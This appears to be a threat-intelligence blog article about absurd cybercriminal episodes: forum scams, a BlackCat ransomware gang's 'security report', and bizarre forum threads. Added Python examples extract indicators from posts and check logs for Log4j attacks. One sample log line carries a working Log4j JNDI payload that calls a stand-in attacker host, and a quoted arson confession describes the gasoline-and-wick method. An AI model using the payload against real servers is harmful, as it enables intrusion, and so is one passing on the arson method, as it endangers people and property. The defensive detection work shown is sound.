Laughter in the dark: Tales of absurdity from the cyber frontline and what they taught us

Figure 4: The BreachForums administrator provides some reassurance
In a plot twist that will surprise no one, Fitzpatrick removed the scammer’s permissions and banned him, all without paying – making this a classic example of a ‘rip and run’ scam.


The serious side

It’s undoubtedly entertaining to watch threat actors attacking each other instead of organizations. But there are two key practical learning points here:

  1. Unintended fallout. While scammers will sometimes set up fake marketplaces and sites with the intention of deceiving threat actors, it’s possible that others – such as researchers, analysts, journalists, and law enforcement personnel – may also fall victim to these schemes. That may involve paying to access ‘closed’ forums which are actually scam sites, or giving away credentials on fake marketplaces. Learning about the different types of scams and how they work may help such groups avoid becoming victims.
  2. A rich source of intelligence. Many criminal marketplaces and forums have dedicated sections for ‘arbitration,’ where users can bring complaints and allegations to moderators. As we explained in Part 4 of this series, these sections are often a rich source of intelligence, because many threat actors are so indignant about being scammed that they will happily post screenshots, chat logs, and other details as proof when opening an arbitration case. In the examples we looked at, we found cryptocurrency addresses, usernames, transaction IDs, email addresses, IP addresses, victim names, source code, screenshots of desktops (which included open browser tabs, chats, conversations, weather conditions, and timezones), and other information. 
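To show what the second point looks like in practice, here is an added example (not code from the original article or from the authors) that pulls the kinds of indicators listed above out of the text of an arbitration complaint. The post, the addresses and the IP are all constructed for the demonstration; the regular expressions are deliberately simple and are assumptions about what such a post contains, not a complete indicator grammar.

```python
import re
from collections import defaultdict

# Constructed sample: an arbitration complaint of the kind described above.
# Every value in it (user, address, transaction, email, IP) is made up.
SAMPLE_POST = """
Opening a claim against user darkseller99. I paid 0.05 BTC to
bc1qar0srrr7xfkvy5l643lydnw9re59gtzzwf5mdq on 2023-04-12, tx
3a1b2c3d4e5f60718293a4b5c6d7e8f93a1b2c3d4e5f60718293a4b5c6d7e8f9.
He said to contact him at seller99@example.com and his panel was at
185.199.108.1 but it never came online. Screenshot of our jabber attached.
"""

# Indicator patterns (assumed, illustrative): bech32 and legacy base58
# bitcoin addresses, 64-hex transaction ids, e-mail addresses, IPv4.
PATTERNS = {
    "btc_address": re.compile(
        r"\b(?:bc1[ac-hj-np-z02-9]{25,62}|[13][a-km-zA-HJ-NP-Z1-9]{25,34})\b"
    ),
    "tx_hash": re.compile(r"\b[0-9a-fA-F]{64}\b"),
    "email": re.compile(r"\b[\w.+-]+@[\w-]+(?:\.[\w-]+)+\b"),
    "ipv4": re.compile(
        r"\b(?:(?:25[0-5]|2[0-4]\d|1?\d?\d)\.){3}(?:25[0-5]|2[0-4]\d|1?\d?\d)\b"
    ),
}


def extract_indicators(text):
    """Return {indicator_type: sorted unique matches} found in one post."""
    found = defaultdict(set)
    for name, pattern in PATTERNS.items():
        for match in pattern.findall(text):
            found[name].add(match)
    return {name: sorted(values) for name, values in found.items() if values}


def defang(indicator, kind):
    """Render network indicators so they cannot be clicked or resolved
    by accident when pasted into a report (1.2.3.4 -> 1.2.3[.]4)."""
    if kind == "ipv4":
        head, _, last = indicator.rpartition(".")
        return f"{head}[.]{last}"
    if kind == "email":
        local, _, domain = indicator.partition("@")
        return f"{local}[@]{domain.replace('.', '[.]')}"
    return indicator


if __name__ == "__main__":
    for kind, values in extract_indicators(SAMPLE_POST).items():
        for value in values:
            print(f"{kind:12} {defang(value, kind)}")
```

Run over a folder of scraped arbitration threads, the same loop gives a first-pass indicator list per complaint; the defanged form is what goes into the write-up, and the raw values stay in the analyst's working notes.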

One hat, two hat, Black Cat, blue hat?

We’ve noted in previous research that some ransomware groups like to refer to themselves as ‘pentesters’, to lend themselves an air of undeserved legitimacy – with some even offering ‘security reports’ to their victims (after getting paid, naturally). Our IR team observed a particularly egregious example of this practice in 2022.

An organization in the US was targeted in an ALPHV/BlackCat ransomware attack. There was nothing particularly unusual about the attack itself, and, having negotiated a significant discount, the organization paid the ransom. 

Along with the decryptor, the organization also received a ‘security report’ from the threat actor, in the form of a short text file complete with spelling mistakes, grammatical errors, and profanity. (We suspect the report would not pass muster with any self-respecting pentesting outfit – no screenshots, diagrams, or professionally-produced PDFs here.)

In the ‘report,’ the threat actor described the vulnerability they used to obtain initial access:

These points should answer most questions, if you want to know anything else or have problems with decryption, let us know.

1. You had an old critical Log4j vulnerability not fixed on Horizon, this is how we were able to get in initially, it was a bulk scanning, not like we were targetting [sic] you intentionally.

The threat actor went on to (very briefly) explain how they moved through the network, and provided some basic, and not necessarily practical, security recommendations:

2. Once inside your horizon VM, we dumped credentials, got some Domain admin, cracked the hash and [were] able to move laterally. 

Its [sic] absolutely [sic] madness to have 3k computers on the same domain, you should split all the machines between different domains, like …ONLINE, FINANCIAL.. you get the idea, so if one domain is infilitrated [sic] somehow not all the infrastructure will be compromised.

Also you should routinely review sensitive information like passports, bank accounts and so on and have them on a different domain, even more secured.

Try search on fileservers for the word passport, driving license, background… put all those files on [sic] a safe.

The threat actor proceeded to advise the victim not to “use any massively used backup software…Cant [sic] go deeper on that.” We assess that the threat actor was admitting here that they’re familiar with popular backup applications and know how to extract data from them. 

4. Once network was scanned, we went for the backup servers which you should have on a different domain under 5 different keys and 2FAs.

Dont [sic] use any massively used backup software, its [sic] a goldmine for us. Cant [sic] go deeper than that, just don’t [sic] use any of the big names.

Interestingly – and we mention this only because it’s fascinating to get a threat actor’s opinion on the subject – the threat actor then provided further security advice on monitoring logs, noting that “sophos is a good AV.”

5. At this point it should be clear to you that having a database of passwords for all services and services on the local network, it took us a few days to verify the credentials and make a plan of attack.

We have to say sophos is a good AV, however no one monitors the logs on your network or at least they dont [sic] do on weekends.

[…]

8. General Recommendation.

8.1. Install a hard-to-override antivirus, Sophos

Obligatory 2FA function to be enabled on the input, at least for domain admins. The most expensive is not always the best one, EDRs or MSPs if they are not being watched the logs 24/7 [sic] are useless and no MSP does that even if they tell you otherwise.

The threat actor also recommended the use of two-factor authentication, and suggested that the organization “install sophos on servers which are DC, fileservers, backups or critical and monitor…logs each 24hrs.”

The threat actor ended their report by saying, apparently without any trace of irony: “Its [sic] been an honor working with you” and concluded with a bizarre exhortation to “keep up the good maple syrup and trucker protests” – suggesting that they mistakenly believed the victim was based in Canada.

The serious side

As we noted in a 2023 article exploring the relationship between ransomware groups and the media, ransomware is becoming increasingly professionalized and commoditized. One symptom of this is ransomware groups attempting to paint a picture of themselves as legitimate security professionals and outfits, by publishing ‘press releases’ and ‘security reports’ (as in the BlackCat case described above).

This kind of rebranding is a tactic borrowed from legitimate industries, and it’s perhaps not unreasonable to speculate that ransomware groups may do this more in the future – perhaps as a recruitment tool, or to try and alleviate negative coverage from the media and attention from law enforcement.

Practically speaking, so-called ‘security reports’ from ransomware groups may contain valuable information about how the threat actor gained access and pivoted through the network – particularly if it can be verified independently, as our IR team did in this case study. This is potentially very useful to know when it comes to recovery and remediation. 

We would, however, advise that any organizations in possession of such reports do verify the information, and take any security recommendations from threat actors with a generous pinch of salt before acting on them.
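As an added illustration of what independently verifying such a report can mean (example code, not from the article or from the IR team), the block below checks two of the claims the BlackCat ‘report’ quoted above makes against log data: that initial access came through a Log4j lookup on the web-facing server, and that privileged activity went unwatched at weekends. The access-log lines and logon events are constructed for the example, the `${jndi:` marker is the well-known plain form of a Log4j lookup string (obfuscated variants exist and need broader rules), and the business-hours window is an assumption.

```python
import re
from datetime import datetime

# Constructed sample web-server access log (Apache combined format). The
# second line carries a JNDI lookup string in the User-Agent field, the
# plain marker of a Log4j exploitation attempt. Not from the incident.
WEB_ACCESS_LOG = [
    '10.0.0.5 - - [12/Jan/2022:03:14:07 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [12/Jan/2022:03:16:21 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.9:1389/a}"',
    '10.0.0.7 - - [12/Jan/2022:03:20:44 +0000] "GET /portal/login HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
]

# Constructed domain-controller logon events: (timestamp, account, host, privileged?)
LOGON_EVENTS = [
    ("2022-01-12 09:02:10", "j.doe", "WS-041", False),
    ("2022-01-15 02:41:33", "da-backup", "DC01", True),   # Saturday, 02:41
    ("2022-01-16 23:05:12", "da-backup", "FS02", True),   # Sunday
    ("2022-01-17 10:15:00", "da-backup", "DC01", True),   # Monday, business hours
]

JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
ACCESS_LINE = re.compile(r"^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\]")


def find_jndi_lookups(lines):
    """Return (source_ip, timestamp) for each access-log line carrying a
    plain JNDI lookup string. Nested/obfuscated lookups are not matched."""
    hits = []
    for line in lines:
        if JNDI_LOOKUP.search(line):
            m = ACCESS_LINE.match(line)
            hits.append((m.group("src"), m.group("ts")) if m else ("?", "?"))
    return hits


def offhours_privileged_logons(events, start_hour=8, end_hour=18):
    """Privileged logons that fall on a weekend or outside the assumed
    business-hours window [start_hour, end_hour)."""
    flagged = []
    for ts, account, host, privileged in events:
        if not privileged:
            continue
        when = datetime.strptime(ts, "%Y-%m-%d %H:%M:%S")
        weekend = when.weekday() >= 5
        after_hours = not (start_hour <= when.hour < end_hour)
        if weekend or after_hours:
            flagged.append((ts, account, host))
    return flagged


def cross_check(access_log, logon_events):
    """Reduce both checks to answers for the claims a report might make."""
    jndi = find_jndi_lookups(access_log)
    offhours = offhours_privileged_logons(logon_events)
    return {
        "log4j_lookup_seen": bool(jndi),
        "log4j_sources": sorted({src for src, _ in jndi}),
        "offhours_privileged_logons": len(offhours),
    }


if __name__ == "__main__":
    for key, value in cross_check(WEB_ACCESS_LOG, LOGON_EVENTS).items():
        print(f"{key}: {value}")
```

A positive result on either check corroborates the report; a negative one is not proof the claim is false, only that this log source does not show it, which is exactly the kind of gap that should prompt looking elsewhere rather than trusting the attacker's narrative.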

Ice cream, e-liquid, Russian convicts, and Ancient Egypt

In our 2025 five-part series on what cybercriminals do with their ill-gotten gains – based on discussions in obscure areas of criminal forums – we found posts suggesting threat actors are involved/interested in fraud, theft, money laundering, shell companies, stolen and counterfeit goods, counterfeit currency, pornography, sex work, stocks and shares, pyramid schemes, gold, diamonds, insider trading, construction, real estate, drugs, offshore banking, hiring money mules (people hired by launderers to physically or virtually transport/transfer money) and smurfs (people hired to conduct small transactions in order to launder a larger amount), tax evasion, affiliate advertising and traffic generation, restaurants, education, wholesaling, tobacco and vaping, pharmaceuticals, gambling – and, believe it or not, cybersecurity companies and services.

But perhaps the most bizarre discussion we saw was a thread on a Russian-language cybercrime forum. It started innocently enough, with a user asking if it would be feasible to open an ice cream stall with 200,000 roubles (around $2,400 as of this writing).

Without any prompting, another user – who described themselves as “the master of the ice cream business” – confessed to arson.

In a very detailed post, they described setting fire to a competitor’s ice cream kiosk in the early 2000s, apparently reassured by the fact that “the statute of limitations…has already passed.” They went on to explain exactly what they used to commit the crime:

“…a crowbar, a plastic bottle with gasoline, a wick on an extension cord, matches…I noticed a vertical hollow pipe sticking out of the roof [of the kiosk]…I poured the whole bottle into it, stuffed a wick soaked in gasoline, and set it on fire…I never saw that business or that stall again.”

That threat actors are involved in both legitimate and criminal business activities came as no shock to us (although we didn’t expect there to be such scale and diversity). We were, however, a little taken aback to discover that the ice cream business can be so cut-throat (although any Scottish readers may be less surprised).

If ice cream arson won the title for ‘Weirdest Finding’, there were several other worthy contenders:

  • A proposal to outsource software development, hardware manufacturing, and cybersecurity to Russian prison inmates. Some threat actors suggested that this could work in some cases (e.g., development of crude malware), while many others were sceptical and – perhaps surprisingly, given the proliferation on cybercrime forums of fenya, a dialect popular in Russian prisons – somewhat disparaging about the abilities of prisoners
  • A threat actor who shared details of a controversial moneymaking scheme: selling e-liquid to schoolchildren. Another user took them to task (“I’m reading this as a parent…don’t you fucking have children?”). To the amusement of other threat actors in the thread, the two began a good old-fashioned flame war (“In the stores there is alcohol, cigarettes…maybe you should go to the mommies’ forum?”; “LEAVE YOUR ADDRESS…WE’LL COME NOW, WHEREVER YOU ARE”; “I don’t give a fuck about other people’s children”, and so on)
  • In a case more alarming than amusing, we saw one threat actor advise others to invest in a prominent cybersecurity vendor, noting that the vendor may soon be acquiring another company. Irony aside, this raises the troubling possibility that threat actors could – if they’re not already – be shareholders (and therefore able to vote on corporate actions, receive dividends, etc.) of a company that tracks and disrupts threat actors
  • But runner-up to the ice cream arson confession surely went to an enterprising threat actor who claimed to have “found some pharaonic and coptic monuments [i.e., Ancient Egyptian artifacts]…only two people know about its location. We want to sell it, but we don’t know how…to handle the shipment and the right place to sell in an auction (black market).” The user uploaded two photos of what appeared to be a sarcophagus lying on bubble wrap. To our surprise, some users expressed an interest in purchasing the ‘artifacts,’ with one even offering to put the sellers in touch with a buyer “who will buy it immediately after his expert confirms.”
